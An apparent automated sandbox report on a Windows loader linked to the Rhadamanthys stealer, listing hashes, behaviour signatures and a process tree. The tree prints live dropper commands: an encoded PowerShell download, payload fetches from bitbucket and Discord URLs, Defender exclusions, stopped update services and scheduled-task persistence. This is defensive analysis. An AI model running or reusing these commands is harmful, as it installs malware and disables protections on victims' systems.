Resubmissions

23-06-2024 19:34

240623-yac8yazcph 3

23-06-2024 19:33

240623-x9rd6szcne 10

23-06-2024 19:32

240623-x895wstbkr 10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-06-2024 19:33

General

  • Target

    Loader/Loader.exe

  • Size

    7KB

  • MD5

    b5e479d3926b22b59926050c29c4e761

  • SHA1

    a456cc6993d12abe6c44f2d453d7ae5da2029e24

  • SHA256

    fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

  • SHA512

    09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

  • SSDEEP

    192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 6 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Power Settings 1 TTPs 4 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 17 IoCs
  • Launches sc.exe 7 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:384
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:676
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:968
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:540
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:64
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1068
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1096
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1204
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:3124
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Drops file in System32 directory
                    PID:1260
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1300
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                      1⤵
                        PID:1372
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1404
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                          1⤵
                            PID:1460
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1468
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1532
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2252
                                    • C:\Windows\SysWOW64\openwith.exe
                                      "C:\Windows\system32\openwith.exe"
                                      3⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3328
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1548
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1616
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1668
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1744
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1796
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1860
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                              1⤵
                                                PID:1904
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1964
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1972
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1016
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                      1⤵
                                                        PID:2092
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2108
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2228
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2348
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2488
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2524
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                1⤵
                                                                  PID:2640
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2704
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2720
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2740
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2748
                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                        1⤵
                                                                          PID:2988
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2632
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:3212
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                              1⤵
                                                                                PID:3376
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of UnmapMainImage
                                                                                PID:3468
                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader\Loader.exe"
                                                                                  2⤵
                                                                                  • Checks computer location settings
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1448
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
                                                                                    3⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4084
                                                                                    • C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb0.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb0.exe"
                                                                                      4⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4332
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\34C7.tmp\34C8.tmp\34C9.bat C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb0.exe"
                                                                                        5⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4588
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          6⤵
                                                                                            PID:3692
                                                                                          • C:\Windows\system32\chcp.com
                                                                                            chcp 1251
                                                                                            6⤵
                                                                                              PID:3316
                                                                                            • C:\Windows\system32\findstr.exe
                                                                                              findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                                                                                              6⤵
                                                                                                PID:4884
                                                                                              • C:\Windows\system32\findstr.exe
                                                                                                findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                                                                                                6⤵
                                                                                                  PID:3628
                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                  findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                                                                                                  6⤵
                                                                                                    PID:4584
                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                    schtasks /query /tn "MyBatchScript"
                                                                                                    6⤵
                                                                                                      PID:4416
                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                      schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                                                                                                      6⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:3368
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                                                                                                      6⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:3552
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                                                                                                        7⤵
                                                                                                          PID:2476
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                                                                                                        6⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4280
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                                                                                                          7⤵
                                                                                                            PID:3632
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
                                                                                                          6⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:664
                                                                                                    • C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb1.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb1.exe"
                                                                                                      4⤵
                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:2332
                                                                                                    • C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb2.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb2.exe"
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1476
                                                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3024
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                        5⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4816
                                                                                                        • C:\Windows\system32\wusa.exe
                                                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                          6⤵
                                                                                                            PID:2932
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                          5⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:1872
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                          5⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:4616
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                          5⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:1916
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                          5⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:1308
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                          5⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:3136
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                          5⤵
                                                                                                          • Power Settings
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3076
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                          5⤵
                                                                                                          • Power Settings
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4520
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                          5⤵
                                                                                                          • Power Settings
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2912
                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                          5⤵
                                                                                                          • Power Settings
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3316
                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                          C:\Windows\system32\dialer.exe
                                                                                                          5⤵
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:5080
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          C:\Windows\system32\sc.exe delete "AAWUFTXN"
                                                                                                          5⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:3440
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
                                                                                                          5⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:4960
                                                                                                      • C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb3.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb3.exe"
                                                                                                        4⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4124
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3544.tmp\3545.tmp\3546.bat C:\Users\Admin\AppData\Roaming\n5nv3nld.2tb3.exe"
                                                                                                          5⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4236
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            6⤵
                                                                                                              PID:4152
                                                                                                            • C:\Windows\system32\where.exe
                                                                                                              where node
                                                                                                              6⤵
                                                                                                                PID:4912
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
                                                                                                                6⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3796
                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                msiexec /i nodejs-installer.msi /quiet
                                                                                                                6⤵
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1988
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"
                                                                                                                6⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:4808
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F
                                                                                                                6⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2508
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                      1⤵
                                                                                                        PID:3580
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:3760
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:3916
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:3624
                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:4396
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                1⤵
                                                                                                                  PID:4708
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                  1⤵
                                                                                                                    PID:464
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                    1⤵
                                                                                                                      PID:1508
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                      1⤵
                                                                                                                        PID:1040
                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                        1⤵
                                                                                                                          PID:944
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                          1⤵
                                                                                                                            PID:4924
                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                            1⤵
                                                                                                                              PID:4304
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:5048
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                PID:4184
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                1⤵
                                                                                                                                • Drops file in Windows directory
                                                                                                                                PID:2360
                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:3592
                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:3260
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:2684
                                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:4684
                                                                                                                                      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:2732
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                          1⤵
                                                                                                                                            PID:4516
                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                            1⤵
                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                            • Enumerates connected drives
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            • Drops file in Windows directory
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
